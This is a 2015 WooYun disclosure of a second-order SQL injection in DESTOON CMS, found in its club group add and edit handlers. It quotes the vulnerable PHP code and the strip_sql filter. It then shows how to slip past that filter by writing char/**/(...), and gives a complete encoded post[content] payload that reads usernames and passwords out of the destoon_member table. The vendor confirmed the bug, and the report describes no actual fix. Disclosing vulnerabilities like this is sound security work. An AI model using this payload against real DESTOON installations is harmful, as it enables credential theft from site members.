当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151369

漏洞标题:destoon最新版注入(绕过过滤出任意数据)

相关厂商:DESTOON

漏洞作者: 玉林嘎

提交时间:2015-11-03 11:44

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-03: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

我会告诉你是三次注入么.

详细说明:

destoon最新版
漏洞文件:/module/club/my_group.inc.php

case 'add':
		if($MG['club_group_limit'] && $limit_used >= $MG['club_group_limit']) dalert(lang($L['info_limit'], array($MG['club_group_limit'], $limit_used)), $MODULE[2]['linkurl'].$DT['file_my'].'?mid='.$mid.'&job='.$job);
		$need_captcha = $MOD['captcha_group'] == 2 ? $MG['captcha'] : $MOD['captcha_group'];
		$need_question = $MOD['question_group'] == 2 ? $MG['question'] : $MOD['question_group'];
		if($submit) {
			$msg = captcha($captcha, $need_captcha, true);
			if($msg) dalert($msg);
			$msg = question($answer, $need_question, true);
			if($msg) dalert($msg);
			$post['username'] = $_username;
			if($do->pass($post)) {
				$CAT = get_cat($post['catid']);
				if(!$CAT) dalert(lang($L['group'], array($CAT['catname'])));
				$post['addtime'] = $post['level'] = $post['fee'] = 0;
				$post['style'] = $post['template'] = $post['note'] = $post['filepath'] = '';
				$need_check =  $MOD['check_group'] == 2 ? $MG['check'] : $MOD['check_group'];
				$post['status'] = get_status(3, $need_check);
				$post['hits'] = 0;
				$post['areaid'] = $cityid;
				$post['filepath'] = '';
				$do->add($post);
				$msg = $post['status'] == 2 ? $L['success_check'] : $L['success_add'];
				$js = '';
				set_cookie('dmsg', $msg);
				$forward = $MODULE[2]['linkurl'].$DT['file_my'].'?mid='.$mid.'&job='.$job.'&status='.$post['status'];
				$msg = '';
				$js .= 'window.onload=function(){parent.window.location="'.$forward.'";}';
				dalert($msg, '', $js);
			} else {
				dalert($do->errmsg, '', ($need_captcha ? reload_captcha() : '').($need_question ? reload_question() : ''));
			}
		} else {
			foreach($do->fields as $v) {
				$$v = '';
			}
			$content = '';
			$catid = intval($catid);
			$areaid = $cityid;
			$item = array();
		}
	break;
case 'edit':
		$itemid or message();
		$do->itemid = $itemid;
		$item = $do->get_one();
		if(!$item || $item['username'] != $_username) message();
		if($submit) {
			$post['username'] = $_username;
			if($do->pass($post)) {
				$post['catid'] = $item['catid'];
				$post['title'] = $item['title'];
				$post['level'] = $item['level'];
				$post['fee'] = $item['fee'];
				$post['style'] = $item['style'];
				$post['template'] = $item['template'];
				$post['filepath'] = $item['filepath'];
				$post['status'] = $item['status'];
				$post['hits'] = $item['hits'];
				$do->edit($post);
				set_cookie('dmsg', $L['success_edit']);
				dalert('', '', 'parent.window.location="'.$forward.'"');
			} else {
				dalert($do->errmsg);
			}
		} else {
			extract($item);
		}
	break;


首先通过add操作 可引入\
而在edit操作中
$item = $do->get_one(); 直接取出
$item['title'] 传给$post 参数 进入edit函数 无任何过滤
而在文件:/module/club/group.class.php (add() edit()所在文件)

function edit($post) {
		$this->delete($this->itemid, false);
		$post = $this->set($post);
		$sql = '';
		foreach($post as $k=>$v) {
			if(in_array($k, $this->fields)) $sql .= ",$k='$v'";
		}
        $sql = substr($sql, 1);
	    $this->db->query("UPDATE {$this->table} SET $sql WHERE itemid=$this->itemid");
		$this->update($this->itemid);
		clear_upload($post['thumb']);
		return true;
	}


$post数组里面不仅有之前从数据库取出,也通过post传入了 $post[thumb] $post[content]
而2个变量 在后面的update操作刚好在$title后面 于是通过$title引入\ 转义' 后面一个参数在加以控制进行注入
漏洞大概原理如此 其他下面说

漏洞证明:

证明:
注册个企业会员 创建商圈 title处引入\

1.png


然后在编辑

2.jpg


然后你会发现thumb 和 content传入先后 就是他们update顺序的先后 而thumb会有个is_url的检测不可控制 所以先传入content 即可解决
接下来是绕过过滤的问题了

function strip_sql($string, $type = 1) {
	$match = array("/union/i","/where/i","/having/i","/outfile/i","/dumpfile/i","/0x([a-f0-9]{2,})/i","/select([\s\S]*?)from/i","/select([\s\*\/\-\{\(\+@`])/i","/update([\s\*\/\-\{\(\+@`])/i","/replace([\s\*\/\-\{\(\+@`])/i","/delete([\s\*\/\-\{\(\+@`])/i","/drop([\s\*\/\-\{\(\+@`])/i","/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i","/right[\s]*\(/i","/mid[\s]*\(/i","/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/make_set[\s]*\(/i","/ascii[\s]*\(/i","/bin[\s]*\(/i","/oct[\s]*\(/i","/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i","/conv[\s]*\(/i");
	$replace = array('union','where','having','outfile','dumpfile','0x\\1','select\\1from','select\\1','update\\1','replace\\1','delete\\1','drop\\1','load_file(','substring(','substr(','left(','right(','mid(','concat(','concat_ws(','make_set(','ascii(','bin(','oct(','hex(','ord(','char(','conv(');
	if($type) {
		return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string);
	} else {
		return str_replace(array('d', 'e', 'g', 'i', 'm', 'n','p', 'r', 's', 't', 'v', 'x'), array('d', 'e', 'g', 'i', 'm', 'n', 'p', 'r', 's', 't', 'v', 'x'), $string);
	}
}


细看你会发现这个过滤中所以 ascii( char( 的过滤方式存在问题 /char[\s]*\(/i

我们可以传入char/**/(1) 即可绕过 但是直接出数据不可能了 那我们更新好我们的语句
再一次编辑 再进行注入 这样就是3次注入啦
而且在edit() 中set() 中最后会进行次$post = dhtmlspecialchars($post);
所以直接引入' 还是不行 还是只能引入\ 2个参数注入
但是content是永远从post直接获取的 于是重新挑选

$post['catid'] = $item['catid'];
$post['title'] = $item['title'];
$post['level'] = $item['level'];
$post['fee'] = $item['fee'];
$post['style'] = $item['style'];
$post['template'] = $item['template'];
$post['filepath'] = $item['filepath'];
$post['status'] = $item['status'];
$post['hits'] = $item['hits'];


我们挑选template 和 filepath 配合注入
第一次编辑
content 应该是

post%5Bcontent%5D=,template=char/**/(92),filepath=char/**/(44,99,111,110,116,101,110,116,61,40,115,101,108,101,99,116,32,99,111,110,99,97,116,40,117,115,101,114,110,97,109,101,44,112,97,115,115,119,111,114,100,41,32,102,114,111,109,32,100,101,115,116,111,111,110,95,109,101,109,98,101,114,32,108,105,109,105,116,32,49,41,35)#


template 引入 \
filepath则是

,content=(select concat(username,password) from destoon_member limit 1)#


3.png


注意 content在前 thumb在后

5.png


之后再编辑一次
点进去就看到

QQ图片20151102205815.png


乌云编辑器\被转义啦。。。 - -

修复方案:

修复

版权声明:转载请注明来源 玉林嘎@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-03 15:34

厂商回复:

感谢反馈 我们会尽快修复

最新状态:

暂无